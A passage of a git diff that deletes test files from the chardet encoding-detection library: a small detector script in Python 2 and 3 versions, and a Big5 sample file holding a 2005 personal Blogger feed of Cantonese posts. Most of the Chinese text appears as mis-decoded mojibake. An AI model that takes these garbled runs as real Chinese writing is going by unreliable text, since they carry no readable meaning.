'rb'): - u.feed(line) - if u.done: break - u.close() - result = u.result - if result['encoding']: - print(result['encoding'], 'with confidence', result['confidence']) - else: - print('******** no result') - count += 1 -print(count, 'tests') diff --git a/chardet/test.py.bak b/chardet/test.py.bak deleted file mode 100644 index 64f5dfe..0000000 --- a/chardet/test.py.bak +++ /dev/null @@ -1,19 +0,0 @@ -from chardet.universaldetector import UniversalDetector -import sys, glob - -count = 0 -u = UniversalDetector() -for f in glob.glob(sys.argv[1]): - print f.ljust(60), - u.reset() - for line in file(f, 'rb'): - u.feed(line) - if u.done: break - u.close() - result = u.result - if result['encoding']: - print result['encoding'], 'with confidence', result['confidence'] - else: - print '******** no result' - count += 1 -print count, 'tests' diff --git a/chardet/tests/Big5/0804.blogspot.com.xml b/chardet/tests/Big5/0804.blogspot.com.xml deleted file mode 100644 index fe3ebfd..0000000 --- a/chardet/tests/Big5/0804.blogspot.com.xml +++ /dev/null @@ -1,325 +0,0 @@ - - - - - - -0 -<img src="http://photos1.blogger.com/img/60/1611/640/melon84a.jpg"><img src="http://photos1.blogger.com/img/60/1611/640/melonposter.jpg"><br><img src="http://photos1.blogger.com/img/60/1611/640/melonposter.jpg"><img src="http://photos1.blogger.com/img/60/1611/640/melon84a.jpg"> - -tag:blogger.com,1999:blog-8189011 -2005-10-21T00:12:34Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -ling - -2005-10-21T08:11:00+08:00 -2005-10-21T00:12:34Z -2005-10-21T00:12:34Z - -tag:blogger.com,1999:blog-8189011.post-112985355437951392 -¡m11₪כ×÷¿½¨¹¡n - -
    - -¡m11₪כ×÷¿½¨¹¡n¡m11₪כ×÷¿½¨¹¡n¡m11₪כ×÷¿½¨¹¡n¡m11₪כ×÷¿½¨¹¡n - -
    - - - -
    - -----©]¦± - -
    -
    -false -
    - - - -ling - -2005-10-20T23:31:00+08:00 -2005-10-20T16:05:30Z -2005-10-20T15:38:41Z - -tag:blogger.com,1999:blog-8189011.post-112982272115495338 -¸₪£§כ¾ק¥b¥y¦h - -
    - keroro¹ך¦b₪׃duk e.. -
    -tamama³£«Y -3- -
    -__________________ -
    -₪µ₪י₪SֹN×נ¾ַ -
    -reason«Y.. ¦³³¥°µ...... -
    - -
    - -
    - -¦n²´°Var.... - - -Tired - - -.... µo₪ײ₪ײ¿N.... ְY·wְY₪S­«ְYµh.......... - - -
    - -
    -
    - -
    - - -bkay: - -
    ---" -
    -¬Q±ge¨ֶ­רֳצ§¨ֶga....... :)
    -
    -
    -
    -
    -
    - - - -
    -
    -
    -false -
    - - - -ling - -2005-10-18T23:57:00+08:00 -2005-10-18T15:59:29Z -2005-10-18T15:59:29Z - -tag:blogger.com,1999:blog-8189011.post-112965116967919205 -new target -3- - -
    - -BE DELICIOUS! - -
    -
    -false -
    - - - -ling - -2005-10-12T22:38:00+08:00 -2005-10-12T14:46:42Z -2005-10-12T11:38:42Z - -tag:blogger.com,1999:blog-8189011.post-112911712247206764 -lovely.. - -
    -

    - -thanks husband ar...!!
    -
    - - - - - -
    -yesterday nite gave me a gift -3- -
    - -

    -

    - -

    -

    -ֵ¥₪U.. µL¼ִ¦n¯÷!!::::
    -
    - -http://media.881903.com/event/djselect/2005071109.asx - -

    -

    -

    -___ -

    -

    -¦³­׃¦P¾ַ¸§¦₪₪®q¬¥[.. §­ר­nar.....
    ¥t1­׃₪S¸§¦₪₪®qd feel.. §­רlike punk ga..
    °£¥×±ר¬¦P\1¼ֻ²L¦ג₪§¥~..¥ע¦³«§common feature... --"
    -

    -
    -
    -false -
    - - - -ling - -2005-10-11T22:25:00+08:00 -2005-10-11T14:26:34Z -2005-10-11T14:26:34Z - -tag:blogger.com,1999:blog-8189011.post-112904079486053975 -XD - -
    -»¯¥‎¥ֽ₪@¦­°_¨׃´NְYµh×÷­n¦÷...... -
    -¦]¬°¥L«e₪@₪ׁ±₪W³×÷ִך¾K¦^®a! ¥L±j­¢¦₪v§ג¯h¾־₪£³פ×÷²´·ת¸C¶}¡C -
    -¸C¶}²´«ב³÷µM¬¨ל§ְֹY₪W©ס₪F₪@×M₪פ¸ע´XְֱYµhֳִ¡AµM«ב§₪°_¨­«ב₪S¬¨ל₪F¥L×÷¦ח×A₪w¸g¿S¦n¡Bֵ|¦n¦b§ֳֹה¡C -
    -¦]¬°₪@°_§ֹ´N¬¨ל³o´X¼ֻ₪ֿ±`×÷¨ֶ¡A©ׂ¥H¥L¨M©w­n°_¨­¬₪@¬©׀₪l¨ה¥L×÷¦a₪ט¦³¨S¦³₪°»ע©_©ַ×÷¨ֶ ¥L§ג´XְֱYµhֳִ¦Y₪F¡C -
    -¦Y×÷®ֹ­װ¬נµMµo²{ֳִ₪U¦³₪@±i¯ָ±ר¡A ¯ָ±ר₪W¼gµ...... ¡§¿ֻ·R×÷¡A§¥X¥h¶Rµז₪F¡A §A×÷¦­ְ\§₪w¸g°µ¦n©ס¦bְ\®א₪W~ ¶X¼צ¦Y§a~·R§A³ב~¡¨ -
    -»¯¥‎¥ֽ₪@ְYֳת₪פ×÷¨«¶i₪F¼p©׀¡A µM«ב´N¯u×÷¬¨ל₪F¼צִִֻֻ×÷¦­ְ\¦b®א₪Wֱ¦³·ם₪ׁ×÷¦­³ר¡C -
    -¥L¬µ§₪¦bְ\®א¦Y¦­ְ\×÷¨א₪l°...... ¡§¨א₪l°~¬Q₪ׁ¨ל©³µo¥ֽ₪F₪°»ע¨ֶ¡H¡¨ -
    -»¯¥‎¥ֽ×÷¨א₪l¦^µ× ¡§¶ג......§Aױז±ב₪TֲI¶^¶^¼²¼²¡B₪j§q₪j¥s×÷¦^₪F®a~ §ג´X­׃®a­ׁµ¹¥´ֳa¿וֳa~ µM«ב₪S«ֱo©ת×÷¦b¨«´Y₪W¼²₪Fְנ¾ְ´X₪U¡B°eµ¹¦₪v₪@­׃¶ֲ²´°י! -
    -»¯¥‎¥ֽ¶V¨׃¶V₪£©ת¥ױ×÷₪S°₪F¨א₪l ¡§¨÷¬°₪°»ע®a?µ¹¥´±½×÷¨÷»ע°®²bµM«ב§A¶‎₪S·|µN¼צִִֻֻ×÷¦­ְ\µ¹§©O?!¡¨ -
    -¨א₪l«יµM₪j®©×÷»¡ ¡§³ב~§A¬O¦b°¨÷­׃³ב~~~ ¶‎¬Q₪ׁ¬¨ל§A¾K¦÷×÷¦^®a¡A ₪@¨{₪l₪ץ×÷§ג§A©װ¨ל©׀¶¡?¡A µM«ב·Q§ג§Aֵ¼¦ח×A´«±¼¡A µ²×G¦b²ז§A¿ַ₪l×÷®ֹ­װ§A½|₪F¦o₪@¥y ¡¥§A÷u»·₪@ֲI~§₪w¸gµ²±B₪F~' -
    -
    -false -
    - - - -ling - -2005-10-07T19:18:00+08:00 -2005-10-07T15:44:11Z -2005-10-07T11:33:56Z - -tag:blogger.com,1999:blog-8189011.post-112868483687073753 -no kidding me again la -<span style="color:#000000;">¯u«Y¦n¶}₪<br />¯u«Y°Vµ³£ֳׁ¯÷<br />¦n­@¥¼¸ױ¹Lµo´c¹</span><br /><span style="color:#000000;"></span><br /><span style="color:#000000;"><br />₪µ₪י₪SֹN×נa... ₪S©ס¦₪v4₪י°²<br />ֻ¼ֻ¿U¿Nattendence ­ר«Y¸פ....<br />¦³³¥¶RgumֲI÷ג~~~~<br /><br />¨ה¹ך§¦³¥´₪י°O ¥´×נ¥H«e­׃­׃<br />«Y₪H³£₪סpassword °£«D§ִ±±o§A₪H³£₪£¦pla haha~</span><br /><span style="color:#000000;">___________________________<br />non-stop playing·³₪כ¦p÷q******************</span><br /></span> -false - - - - -ling - -2005-09-28T23:07:00+08:00 -2005-09-28T15:13:05Z -2005-09-28T15:08:47Z - -tag:blogger.com,1999:blog-8189011.post-112792012729388634 -a lesson -<span style="color:#000000;">₪U₪ָ×÷₪@³ץ«B¡A­°§C₪F·ֵ«׳¡C<br />»PֳQ¦b·L²D×÷®ױ¶י¸ּ¡A¨ׂ¦ז§­ּ¨C±×÷´²¨B¡A¦V¨׃₪ג²oµ₪ג¡AµL¨¥¦a¨«₪W¥b₪p®ֹ¡AµM«ב¦b₪k±J«e₪¬¹D±¦w«ב₪ְ₪ג¡C<br />¥ז©¹¨ג¦~¥b¥H¨׃¡A³ּ×ל×÷₪T­׃₪כ¼צֵ¹L«ב¡A§¨S¦³₪@₪ׁ₪£°¦₪v¡A¬°₪°»ע©M¥L¦b₪@°_¡C<br />·R±¡¬O×¼¥״×÷¡A¦‎ְHµ·R±¡כa¥h¡A§₪]÷¥²M¿פ¡C </span><br /><span style="color:#000000;">¦]¬°±I¹ז¦׃₪¬¬¾ײ©ך×÷ֵ₪H¡A·|¦³¦h₪j×÷¼צ±¡¥h÷«שֵ·R×÷·ֵ«׳©O¡H<br />±J×₪w×ס¦b²´«e¡AֳQ©ס¶}₪F§×÷₪ג¡A·ֵ·ֵ¦a¹D₪F±¦w¡C<br />§«o¥־₪O×÷´₪¦ם₪F¥L×÷₪ג¡A¡u¦^¥h«ב¥´¹q¸µ¹§¡C¡v<br />ֳQ©¨׃₪@­׃§x´b×÷²´¯«¡A¦‎¦p¦P©¹©ץ¡A¨S¦³¦h°₪°»ע«KֲIְYµ×ְ³¡A ¹q¸ֵT°_¡A¨÷ְY¬O¥L·ֵ·ֵ×÷ֱn­µ¡C<br />¡u§¥´¨׃₪F¡C¡v ¡u¶ג¡I§A¥´¨׃₪F¡A§­ּ₪ְ₪ג§a¡I¡v¹q¸¨÷ְY×÷¥L¡A¨S¦³ֱnֵT¡C<br />¡u§»¡¡A§­ּ₪ְ₪ג¡C¡v§₪S­«½ֶ₪F₪@¦¸¡C<br />¡u³ב¡C¡vֳQ²׳©ף¦³₪ְֿ³₪F¡C<br />¡u§A¡A¨S¦³¸­n»¡¶¡H¡v </span><br /><span style="color:#000000;">¡u¶ג¡C¡v<br />¡u¨÷¡A¦A¨£¡C¡v</span><br /><span style="color:#000000;"> ¡u¶ג¡C¡v ֳQ₪w±¾₪W¹q¸¡A§®³µ¸µ©µo§b¡Aµ²§פ₪@¬q·P±¡₪]₪£¬O¥ףֳר¨ֶ¡A¦₪ײ¹ן©ף¥L¨׃»¡¡C<br /></span><br /><span style="color:#000000;">«ַ₪ְֽ¿µ¾v±q¥~­±ֲk¨׃¡A¨£§₪ג₪Wֱ®³µ¸µ©¡A§K₪£₪F₪@°}½ױ¨װ¡C<br />¡u₪~­ט´²¨B¦^¨׃´N¥´¹q¸³ב¡I¯u®¦·R§r¡I¡v §»´»´×÷±¾₪W¹q¸¡AֱY¦b°A±b₪₪¡C<br />¨ג¦~¦h¨׃¡A₪@×½¦b₪₪₪₪·Qµ¦µeµ₪ְ₪ג×÷±¡¸`¡A¸׃¥־«ח¼ֻ×÷®נ×^¥hְח³y´d¼@×÷·Pִ±©O¡H<br />­n¦b§­ּ²ִ₪@¦¸¨£­±×÷×ְ¹־¡Aֱ¬O­n¦b¨÷­׃©w±¡×÷¨Fֵy©O¡H </span><br /><span style="color:#000000;">¸׃¦³­׃­·«B¨׃§U¶ױ₪~¬O¡AµM«ב¥H²Y²M´d¨I×÷₪f§k»P¥L₪ְ₪ג¡AµM«ב¡A§i¶D¥L¡A§ֱ¬O·R§A×÷¡A¥u¬Oµ¥µ¥ֲIֲI×÷¡C<br />₪·QµֳQ¬y²\¡A¬°¥L«ר²\¡A§i¶D¥L­n°ם±j¡A»¡§­ֱּ¥i¥H¬O×B₪ֽ¡AµM«ב¥L·|©ךµ§­ת¡A ­n§§Oֲק¶}¥L₪§ֳ‏₪×₪××÷¡A¦׃§¥H´d¶ֻ«o°ם©w×÷°¼­±§i¶D¥L¡A§­ּ¬O₪£¥i¯א₪F¡C </span><br /><span style="color:#000000;"></span><br /><span style="color:#000000;">µM¦׃¡A³o₪@₪ֱ³£¬O§×÷₪·Q¡A¹ך»₪W×÷ֳQ¡A₪£·|¦p¦¹¡A₪£·|¬y²\¡A₪£·|¨D§¡A§ף₪£·|¶ֻµh¡A¥H§¹ן¥L×÷₪F¸ׁ¨׃»¡¡C<br />ֳQ×÷½T¬O­׃¦n¨k₪H¡A₪@­׃¾A©y®a©~×÷¦n¨k₪H¡A¦‎₪£·|½ֵֽ·R¡A¼gµ¹¥L¼ֶ₪Q«×÷±¡®ׁ¡A ¦³«¦h¦₪µ¥¼©מ¡A¦b¥ז©¹×÷¶g¦~®ֹ¡A¬°₪F¹ךֵח§ג§₪@­׃₪H§ׁ¦b±JסA±¡₪H¸`×÷×ב§פ¹ן¥L¦׃¨¥₪S¶Q₪S₪£¹ך¦b¡C </span><br /><span style="color:#000000;">§¥ֽ₪י¨÷₪ׁ¡A¥L«o«¦³­·«׳×÷§ג§ֵ‎µ¹₪@¸s¦n₪ֽ¡A­C½ֿ©]¡A©ָ§·P«_₪£×ײ±a§¥X¥h©]¹C¡C<br />¥L¬O³o¼ֻ×÷₪@­׃¦n¨k₪H¡A₪@­׃¹ך¦b×÷¦ׁ¹ך₪H¡A₪£·|×ב¨¥¥©»y¡A₪£´¿®»}₪s·ש¡A₪£·|¦Y¾L¸ע÷¡C </span><br /><span style="color:#000000;">·ם§¶}©l»P÷פ₪ֽ¨£­±®ֹ¡A¥L¥mֵס§­n₪p₪¦w¥‏¡A·ם§»P¥t₪@­׃¨k₪H¥h¬₪ָ©]³ץ×÷¹q¼v®ֹ¡A¥L­n§»¡»¡¹q¼v₪±o¡C<br />ֳQ₪§©ף§¡A¹³­׃¼v₪l¡A₪@­׃ֲק₪£¶}¡A«o₪£¥i¯א¥ֿ²ז×÷¼v₪l¡A¥L»¡¹L¡A¥L«H¥פ§¡A ­nµ¹§¦¥ׁ¡A°Q¹½ֵ·R×÷¿W¦»P¦¨p²q§ׂ¡A³o´N¬OֳQ¡A₪@­׃³s₪ְ₪ג³£₪£·|×÷¨k₪H¡C </span><br /><span style="color:#000000;"><br />§¨S§i¶D¦P¾ַ₪ְ₪ג×÷¨ֶ¡A¥־ְ\®ֹ₪ְ¡A§¶R₪F«K·ם¸ת¦b¨S₪H₪W½ׂ×÷±׀«ַ¦Y¶÷¡A¦b¸׃´²¨B×÷®ֹ¶¡¡A§₪@­׃₪H¨ל¹ֿ®ְׁ]¬³ר¡C<br />₪ְ₪ג«ב×÷²ִ₪@­׃¬P´ֱ¡A§¹Lµ»P₪§«e¬¦P×÷¥ֽ¬¡¡A₪@¼ֻ·P¨ל±I¹ז¡A¨S¦³¯S§Oֳר¨¡A³»¦h³QֳQµ½ֵי₪H·N×÷ֱֵ¹Fµyµy¨כ¶ֻ¡C ³ּ³ֵw¸ת¦b°A±b₪₪¡Aֶ[¹מֵ·R₪₪×÷«ַ₪ֽ¡A₪·Q¦₪v´¿§_¬yֵS¥X¦p¦o¯כ§t²±a©ִ×÷¬ץ·w¡A ₪S¬O¥־ְ\®ֹ¨ט¡A§¥²»°²¸ֻ§ײ¿נ¨ל¯כ¦a¥^«P¡A«ַ₪ֽ©µ¹§₪@­׃₪FµM©ף₪×÷·L¯÷¡C<br />¦Yµ¦P¼ֻµL¨‎×÷«K·ם¡A³ֲ₪ל¦a§]₪U°Q¹½×÷­W¥¡A¬נµM·Q©ְ°_ֳQ¡A³o¬O₪ְ₪ג«ב×÷²ִ₪@¦¸·Q©ְ¡C<br />¥H©¹¡A¥L·|²׃₪¦a§ג§₪£·R¦Y×÷µז¬D¥h¡A¦A§ג¦₪v¶÷²°₪₪×÷§³ֵw×÷µז§¨¨ל§«K·ם¸ּ¡C<br />§N×÷₪ׁ¸ּ¦³¼צ´צ¡A¼צ×÷₪ׁ¦³§N¶¼¡A÷ג₪F₪ְ₪ג×÷±¡₪H´N₪£¸׃¦A·Q©ְ¡C<br /><br />¶g₪»¡A²±¸ֻ°²¸ֻ¬ש·|¥h¡A¹ך«h₪@­׃₪H¶]¨׃¥´«Oִײ²y¡A¥´±o«®t₪ג«₪]¯k₪F°_¨׃¡C<br />¨ל²ִ₪K®זֱ₪£¨ל₪@¦¡A¬µ¹j¾ְ¹D×÷₪@¹ן₪p±¡₪H¡A¹ןֳQ°_₪F²ִ₪G¦¸×÷«ה©ְ¡C<br />ֳQֱ`·|ְ°§§ג₪ג«¥H³z®נ½¦¥¬ִס¦n¡A²׃₪×÷¬°§ְ¿²y¡Aְ°§¸ׁ§³N²y¡A¾A®ֹ¦a»¼¨׃¶¼®ֶ¡A÷ג₪F¡A₪ְ₪ג×÷₪H₪£¸׃¨I®¦b«ה©ְ¸ּ¡C<br /><br />¬P´ֱ₪ׁ¡A¥»·Q¦n¦n¦b¹ל«ַ¸ּ÷־ִ±¡A¦‎«ַ₪ֽµL₪×÷»¡₪F¥y¡u§A­ּ®a×÷·s¦n¨k₪H₪£³­§A§r¡I¡v<br />§¥u±o₪@­׃₪H×w¦b¹q¼v°|¸ּ¡Aִ~ִע÷־ִ±¡C<br />¹q¼v°|¸ּ¡A₪S¬O₪@¹ן¹ן±¡«Q¡A¦n§a¡I²ִ₪T¦¸×÷«ה©ְ¦A«׳ִj÷©¡C<br />ֳQ·|¦]§₪@¥y·Q¬¡A¦b₪H¸s₪₪±ֶ¥|₪­₪Q₪ְֱִ×÷¶₪¡A·ַ³ֶ₪@°ן§³ֵw×÷¹s¼L¡A¬¹q¼v®ֹ¡A¬°§®÷®÷₪ג´x¡A´´₪גֱu¡C<br />´²³ץ®ֹ¡AֳQ·|²׃₪¦a§ג§ֵ@¦b¥L×÷¯«e¡A₪£ֵ‎₪H¸s±ְְ½¨ל§¡C<br />¬נµM·Q°_¨÷¦¸§­ּ¥h¬₪ֶF¸ֹ₪ג¡A§ְH₪f»¡₪F¥y·Q¦Y±s¶÷¹־¡A ֳQ¶]₪F₪T¥|®a«K§Q°׃©±₪~§ה¨ל§³ֵw×÷₪f¨‎¡A¥L¶i³ץ®ֹ¹q¼v₪w¼½₪F₪G₪Q₪ְֱִ¡C<br /><br />÷ג₪F¡A·Q¨ל₪ְ₪ג×÷±¡₪H®ֹ¡A₪£¸׃ֵS¥Xֳh©ְ×÷¯÷×÷¡A₪ְ₪ג«ב×÷²ִ₪G­׃¬P´ֱ¡A§¶}©lִ±±o¦³ֲI₪£¹ן«l¡A ¸עֳQ¦b₪@°_®ֹ¡AֱצµM¦ׁ¬O¨IְqµL»y¡A¦ִׁ±±oµL²ב¡A¦‎₪ְ₪ג«ב×÷µL²ב¡A«o¬O¥t₪@÷״ֵ‎₪H²¿´e×÷ֳר¼ץ¡C<br />¥H«e₪±¡₪£¦n¡Aֱ¥i§ל°_ֳQµ²¹ך×÷₪גֱu¡A«r₪W₪@₪f¡A¬µ¬ץ¸~©תֵד×÷₪ת¦L¡A₪±¡«K¦n¨ַ¡C<br />µM«ב¦A¥ײ¥ײ¦a°¥Lµh§_¡AֳQ¦ׁ¹ךֲIְY¨ֳµ¹§₪@­׃·ֵ·ֵ×÷¯÷¡A »PֳQ¦b₪@°_®ֹ¡A§©׃»{¦₪v³ֵw©¸ֱ₪½÷¡A¦]¬°§×¾¹DֳQ¥ֳ»·₪£·|¥ֽ®נ¡A₪]¥ֳ»··|±i¶}ֲשֱuµ¥§×±²ײ¦^¨׃´ֿ®§¡C<br />²{¦b¡A₪@¨ַ¨g¸ֱ®צ½÷¦b§©P®ַ¥´ֲ¶®ֹ¡A§«o´£₪£°_¿³­P¥h©א×ב·S¯ף¡A¦]§×¾¹D¡A¦p×G²ײ₪F­ֲ₪F¶ֻ₪F¡A¨S¦³¦a₪ט¥i¥H¦^ֲk¡C<br /><br />¶R₪F§פֶ{×ק­»°e¦₪v¡Aֶ{×ק­»¬OֳQ°₪@°e¹L×÷×ב¡A ¨÷¦¸¡A¬O§×÷¥ֽ₪י¡A§ֵQ¹D¦a§גֳQ©װ¶i×ב©±¡A³w¦¬D₪Fֶ{×ק­»¡A¥sֳQ¥I₪F¿ת«ב¡A§ג×ב¶כ¨ל¥L₪ג₪W¡A­n¥L°e§×÷¡C<br />¦¬¹L³\¦h¨k₪H°e×÷×ב¡A¨k₪ֽ×÷×ב§פ«o¬O³o¼ֻ³Q§±j­¢¨׃×÷¡A ֱ°O±oֳQֱy₪W×÷ְ×§¼»P·\³i¡A¥L¨S¸ע§»¡¥ֽ₪י§ײ¼ײ¡A¦׃¬O»¡¹ן₪£°_¡A ÷ג₪F¡A¹ן©ף₪ְ₪ג×÷¨k₪ֽ¡A₪£¸׃¬yµ²\¶ּ¯÷·Q©ְ×÷¡C<br /><br />₪U«B₪F¡A§«ז«ז¦£¦£¦a¶]¶i¹ֿ®ְׁ]¡A₪@¨­×÷·ֳ¡A§j¨ל§N®נ¡A₪£¸T´‎¨­µo§¡A¥´₪F­׃¼Q®ק¡A¦n·Q©ְֳQ·ֵ·x×÷ֳh©ך¡C<br />¦V¨׃½k¶מ×÷§¡A´N÷ג³±₪ׁ¥X×ש₪]·|§ׁ₪F±a³¡A ֳQֱ`·|±aµ½ּ¸ׁ»P¯k±₪×÷¯÷¾A®ֹ¦a¥X²{¡A§ג§ֵף¶i¥L×÷³₪U×÷¡A§¦b¹ֿ®ְׁ]×ש₪f¡A¬µ³₪Uִ׳¼vֲשֲש¡A₪£×¾₪S²ִ´X¦¸×÷·Q°_ֳQ¡C<br />²{¦b¡A§²O§×÷«B¡A¥L¬₪£¨ל¡A₪]₪£·|¦A₪¯k₪F¡A₪£¬O¶¡H<br /><br />₪@­׃₪H¦b¹ֿ®ְׁ]×ש₪f¡A³÷©ֳ©ֳ¦a¬y₪U²\¨׃¡A³o¬O₪ְ₪ג«ב×÷²ִ₪@¦¸¬y²\¡C<br />¶V·Q¶Vִ±±o¦₪v«¥i¼¦¡A¨S₪H¯k¨S₪H·R×÷¦n©t³ז¡A²´²\»ף₪פ»פ₪U¡A·םµM§¦V¨׃₪£±a₪ג©¬½ֳ¥ֽ¯ָ¡A¦]¬°ֳQ·|§·ַ³ֶ¡A ¹ֿ®ְׁ]×ש₪f«¦h¸ת«B×÷₪H¡A§«oֵU₪£±o¥L₪H×÷¥״¥ת¡A±q°ד×_¨ל¶ד«|¥Xֱn¡A§V₪O¦a¥H³S₪fְ¿¨÷¹³¬O¬y₪£÷ֹ×÷²\₪פ¡C<br />¦b§₪a¦¨I®¦b§×÷´d¶ֻ₪₪¡A₪@ֲש·ֵ·x×÷₪j₪גֲ׀₪W₪F§×÷­I¡A¶ַ¨׃¼פ±x×÷¦w₪·P¡C<br />§§lµ»ף₪lֲא¹L¨­¨׃¡A­ת¬ץ×÷²´³z¹L°gְ×÷²\₪פ¡A¬¨ל×÷¬OֳQ¡A§©¿²₪±¼ֳQ®³¦b₪ג₪W×÷­±¯ָ¡A×½±µ§ג²\₪פ»ף₪פְ¿¦b¥L¼e₪j×÷¦ח×A₪W¡C<br />¬X¬X×÷¦ח×A₪Wֱ¯d¦³ֳQ×÷¨‎¹D¡A·ֵ·ֵ¼צ¼צ×÷¡A·Q¨ל³o₪@₪ֱ₪w₪£ִ©ף§¡A§₪£¸T©סֱn₪j­ת¡C<br />ֳQ©ח©ח§×÷ְY¡A¦p©¹©ץ¯כ÷Oµ§×÷¸y¡A¨«¥X³עֶ[×÷₪H¸s¡A²׃₪¦a¥L×GµM¦³±a³¡A ¨÷§ג¬°§³o­׃±`§ׁ₪F±a³×÷½k¶מֲ־¯S¦a¥h¶R×÷₪j³¡C<br />§¥־₪O¦a§lµ»ף₪l¡A§גְY©¹ֳQ×÷¯½£ֶp¥h¡Aֲש₪ג÷עדTµֳQ×÷¨­ֲ¡AֳQ°e§¨ל±J××ש₪f¡A¹ן§·ֵ·ֵ×÷¯÷¡A¹D₪Fֱn¦A¨£¡C<br />§­ט₪מ®§×÷²\₪S¶}©l¥ְֶ¡A₪S©סֱn­ת₪F°_¨׃¡A·S±o®ַ₪H×`¥״¡AֳQ¹ן§¯÷₪F¯÷¡A₪£¦A¬O·ֵ·ֵ×÷¡A¦׃¬O­Wְ×÷¡C<br />¡u¨ִ¡A§O­ת¡A­ת₪°»ע©O¡H¡v<br />¡u¶ד¡K¶ד¡K§c¡K§A₪£­n§₪F¡K₪H®a¡K¶ד¡K¶ֻ₪¡K¶ד¡K.¡v<br />¡u¨ִ¡A§¨S¦³₪£­n§A¡A¬O§A₪£­n§×÷¡A¨ִ¡A§O­ת₪F¡C¡v<br />¡u¶ד¡K§₪£­n§A¡K§A¥i¥H¿א¥ײ§r¡K§´N·|₪³n§r¡K¶ד¡K¡v<br />¡u¨ִ¡A§»¡¹L¡A¦p×G§A­n₪ְ₪ג¡A§₪£·|¦÷ִסµ§A×÷¡A§O­ת₪F¡A¨ִ¡C¡v<br />¡u¶ד¶ד¶ד¶ד¡K₪H®a₪£­n¡A§­n§Aִסµ§¡K§A₪£­n§₪F¡K¬O§A₪£­n§₪F¡K¡v<br />¡u©p´N¬O³o»ע¿א¥ײ¡C¡v<br />¡u¶ד¶ד¶ד¶ד¡K₪H®a¥»¨׃´N³o»ע¿א¥ײ₪F¡A§A₪S₪£¬O₪£×¾¹D¡K¶ד¡K₪£­nֲק¶}§¡K₪£¥i¥H₪£­n§¡K¡v<br />¡u¶ג¡C¡v<br />¡u¶ד¡K₪£¬O¶ג¡A­n»¡¦n¡K¡v<br />¡u¶ג¡A§O­ת₪F¡A¨ִ¡C¡v<br />¡u§A₪S¶ג₪F¡K¡v<br />¡u¨ִ¡A°£«D§A₪£­n§¡A§₪£·|ֲק¶}§A¡A§O­ת₪F¡A«¦h₪H¦b¬­C¡I¡v<br />´N³o¼ֻ¡A§¸עֳQ₪ְ₪ג₪F₪Q¥|₪ׁ₪S₪Q₪­­׃₪p®ֹ¡A¥־²\₪פ»ף®ק§גֳQµ¹¿א¦^¨׃₪F¡C<br /><br /><strong>₪]³\¡A§A¨S¦³«צ·׃§©ׂ§ֶ±ז×÷₪ט¦¡·R§¡A³o¨ֳ₪£¥N×ם§A¨S¦³¥־÷ֹ¥‏₪O·R§</strong>¡A³o´N¬O§×÷·s¦n¨k₪HֳQ¡C<br /><strong>µMֱ`¬O­n¥¢¥h«ב¡A₪~ְ´±o§A¨ל©³¾ײ¦³₪°»ע</strong>¡C<br /></span><br /><strong><span style="color:#ff0000;">i love you..</span></strong><br /></span> -false - - - - -ling - -2005-09-28T19:06:00+08:00 -2005-09-28T14:40:39Z -2005-09-28T11:26:30Z - -tag:blogger.com,1999:blog-8189011.post-112790679025968709 -I shop therefore I am. - -
    -ֹN×נְY1°ף.. 2nd -₪Wacct.. ֱ׳acctֱ׳¨ל­רֵ×alevel, ¦׃®a₪S­nֵ××נ -
    -´e¨ל¦÷.. ₪µ₪י§₪janet¹jֲק, ­ל¨׃\³£«Y¦ם₪¸®װgaaaaaaaaaa \§גֱn«l·d¯÷-w- -
    -eng... nth special..... §¬נµMִ±±o₪W¦~¾ַ¬J³¥¦n¦³¥־ -
    -§¦פ­ר¨לeng°ף·|define wat is culture, ֻ²`¨ט§ֲI·|­ר°O±o, ¦hֱֲpoly -- -
    - -
    -₪µ₪יµ¥¥ז¦¬¦ז¥×°}mk, ֱצµM₪W¦~«Y«׳ֵ×, ¦‎¦n¦ֹN«§·Pִ±gummm -
    -
    -·f¦טֵK¨£¨לfeico!! \₪Jyl wor.... \¦׃®aֵ×ive -
    -\¸¥¼¥h¹L¥h¦ז₪U.. ¯u«Y·d³¥.... -0-" -
    -
    -false -
    - - - -ling - -2005-09-28T00:29:00+08:00 -2005-09-27T18:31:50Z -2005-09-27T17:41:10Z - -tag:blogger.com,1999:blog-8189011.post-112784287039590840 -awesome - -
    -927²׳©ף¶}¾ַ~~!§¿נ¨לlor....... -v-
    1×נ¨ל¥h±o×נ³ּ§ְ¥×¥k¨₪¦ל
    ×½ִ±₪W¦ז¥×¥h¥×₪גֳה
    ֻ´Nֳׁ¨לkathriny(=k) leh, \¦nnice nei..
    §¦a¥h¥×₪j®a¼ײ­¹lunch
    ­ר¸׃®ֽ\ְ°§¶R³¥­¹ -3-
    -
    ¦©ף₪W°ף.. ¦n¦₪W¦~­׃d gum la..
    econ¾ַ×נf4/5 d³¥ §µoִ±§­n»×נ¥‎°O±o --"
    -
    ¥[×o*
    -
    ©ס¾ַbilll¥h×בµף.. ·|§¦ׁ₪½
    µ¥®I\¦a©נ³¥₪§«בall»goblin₪סֱֹ
    00xxhome
    -
    ¦׃®a»÷עµL½u·s­׃¥X₪Q¥S§ּ, §A·|µo²{»§¹1¶°§A₪w¸g·|§¹¥‏ֹN®ֽ¥ֽ¥J¬J·N±‎
    \d¥J¯u«Y¦n®£©ֶ--"
    ______
    -
    - - -to my husbby, -
    - -
    -­ר¨ֿ¦A¬°§¾₪, thanksssss v. much!! -
    -¦hֱֲ§A₪§«e¥¢ֲµL¯«1´ֲ¦­¬°§°µ¬J¨ֶ ©O¥ק₪jֲ§¦n÷₪ -
    - - -
    ¦hֱֲ§A₪µ₪י·Q¬°§°µ¬J¨ֶ ¦‎§­ר±ֻ±o¦A­n§A¾₪..
    -
    -
    -
    - -ֹN¥²­n¦A¦Pd¦P§­ַֹNֳצ«Y¬J₪H¦Aֱ¿ֻ¦h µL²ב₪H­ר§@¯÷¸¥ע¦³«§°µ.. -
    ¦n₪₪·N₪f¨S¾Bִd©O­׃4¦rµ-3- ₪£¹L¹ן¦ם©Od₪H¥i¥Hבַ×נ. ­׃dֻ¬J₪H»·¥³£»­ר©ת
    -
    - -
    -ֱ₪fֱ₪ג? w0t a lovely joke... ¦ך³£0±p®נ
    -
    ₪µ₪י­׃₪ׁ¸¨«B³£¸¨±o¯S§Oµ־×A ¯S§Opeaceful~§₪₪·N!
    -
    -
    -false -
    -
